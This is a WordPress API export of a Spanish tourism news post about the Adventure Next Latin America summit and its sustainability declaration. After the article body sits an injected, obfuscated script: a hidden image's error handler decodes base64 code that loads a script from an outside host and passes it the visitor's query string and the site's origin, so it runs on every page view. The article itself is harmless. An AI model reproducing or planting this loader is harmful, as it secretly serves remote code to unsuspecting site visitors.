{"id":5024,"date":"2022-02-15T12:24:15","date_gmt":"2022-02-15T15:24:15","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5024"},"modified":"2025-08-13T16:23:06","modified_gmt":"2025-08-13T19:23:06","slug":"adventure-next-latin-america-la-sostenibilidad-y-la-inclusion-en-el-centro-de-la-recuperacion-del-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5024","title":{"rendered":"Adventure Next Latin America: la sostenibilidad y la inclusi\u00f3n en el centro de la recuperaci\u00f3n del turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\" id=\"los-lideres-del-sector-publico-y-privado-acuerdan-poner-en-practica-la-vision-de-la-omt\">Los l\u00edderes del sector p\u00fablico y privado acuerdan poner\u00a0en pr\u00e1ctica la visi\u00f3n de la OMT<\/h4>\n\n\n\n<p>La OMT ha acogido con benepl\u00e1cito el compromiso hecho por los l\u00edderes del turismo en la cumbre Adventure Next Latin America de realinear el sector a lo largo de un camino de mayor resiliencia y sostenibilidad.<\/p>\n\n\n\n<p>El evento comercial de turismo recibi\u00f3 a los&nbsp;Ministros de Turismo de Panam\u00e1&nbsp;,&nbsp;Colombia&nbsp;,&nbsp;Costa Rica&nbsp;,&nbsp;Ecuador&nbsp;,&nbsp;Guatemala&nbsp;y&nbsp;Honduras&nbsp;, junto con representantes de alto nivel de los gobiernos de Brasil y Jordania.&nbsp;A ellos se unieron l\u00edderes del sector privado, reunidos por&nbsp;Adventure Travel and Trade Association&nbsp;(ATTA).<\/p>\n\n\n\n<p>La cumbre culmin\u00f3 con la firma por todas las partes de la Declaraci\u00f3n: \u00bb&nbsp;Transformaci\u00f3n hacia el futuro del turismo&nbsp;\u00ab, un claro compromiso de actuar sobre el llamamiento de la OMT para que los sectores p\u00fablico y privado trabajen juntos y aprovechen la oportunidad de situar la sostenibilidad y la inclusi\u00f3n en el centro de la reinicio y recuperaci\u00f3n del sector.&nbsp;La Declaraci\u00f3n establece: \u201cel futuro del turismo es colaborativo, reuniendo la sabidur\u00eda ancestral de las comunidades locales e ind\u00edgenas con el conocimiento cient\u00edfico y econ\u00f3mico pionero al servicio de la administraci\u00f3n a largo plazo de los ecosistemas integrados\u201d.<\/p>\n\n\n\n<p>Al mismo tiempo, la Declaraci\u00f3n tambi\u00e9n deja claro el compromiso de los signatarios de avanzar en la \u201ctransformaci\u00f3n hacia una econom\u00eda tur\u00edstica neutra en carbono y m\u00e1s resiliente socialmente\u201d.&nbsp;En noviembre, Panam\u00e1 fue uno de los signatarios fundadores de la&nbsp;Declaraci\u00f3n de Glasgow sobre la Acci\u00f3n Clim\u00e1tica en el Turismo&nbsp;, lanzada por la OMT en la cumbre COP26.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/nota\/72682-eventos-adventure-next-latin-america-la-sostenibilidad-y-la-inclusion-en-el-centro-de-la-recuperacion-del-turismo.html\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/06\/travel2latam.logo_.gif\" alt=\"\" class=\"wp-image-4477\" width=\"184\" height=\"70\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los l\u00edderes del sector p\u00fablico y privado acuerdan poner\u00a0en pr\u00e1ctica la visi\u00f3n de la OMT La OMT ha acogido con benepl\u00e1cito el compromiso hecho por los l\u00edderes del turismo en la cumbre Adventure Next Latin America de realinear el sector a lo largo de un camino de mayor resiliencia y sostenibilidad. El evento comercial de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5025,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-5024","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5024","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5024"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5024\/revisions"}],"predecessor-version":[{"id":10716,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5024\/revisions\/10716"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5025"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5024"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5024"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5024"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}